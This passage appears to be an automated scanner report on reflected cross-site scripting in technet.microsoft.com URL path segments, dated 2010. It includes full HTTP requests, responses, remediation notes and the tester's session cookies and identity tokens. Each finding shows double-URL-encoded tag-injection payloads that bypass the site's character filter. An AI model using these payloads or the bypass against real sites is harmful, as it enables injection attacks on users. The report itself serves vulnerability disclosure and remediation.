17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10208 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:20:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742457.aspx7bce8"><a>7b6302c4f0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aba0%2522%253e%253ca%253e7a9d7184e84 was submitted in the REST URL parameter 1. This input was echoed as 1aba0"><a>7a9d7184e84 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us1aba0%2522%253e%253ca%253e7a9d7184e84/library/bb742548.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us1aba0"><a>7a9d7184e84/library/bb742548" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5422%2522%253e%253ca%253e0e861349984 was submitted in the REST URL parameter 2. This input was echoed as d5422"><a>0e861349984 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryd5422%2522%253e%253ca%253e0e861349984/bb742548.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd5422"><a>0e861349984/bb742548" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bb68%2522%253e%253ca%253e179b803ea96 was submitted in the REST URL parameter 3. This input was echoed as 5bb68"><a>179b803ea96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742548.aspx5bb68%2522%253e%253ca%253e179b803ea96 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:20:23 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742548.aspx5bb68"><a>179b803ea96" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d607%2522%253e%253ca%253eac02de82e96 was submitted in the REST URL parameter 1. This input was echoed as 7d607"><a>ac02de82e96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us7d607%2522%253e%253ca%253eac02de82e96/library/bb742578.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us7d607"><a>ac02de82e96/library/bb742578" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd097%2522%253e%253ca%253ecc6f454d985 was submitted in the REST URL parameter 2. This input was echoed as dd097"><a>cc6f454d985 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarydd097%2522%253e%253ca%253ecc6f454d985/bb742578.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:42 GMT
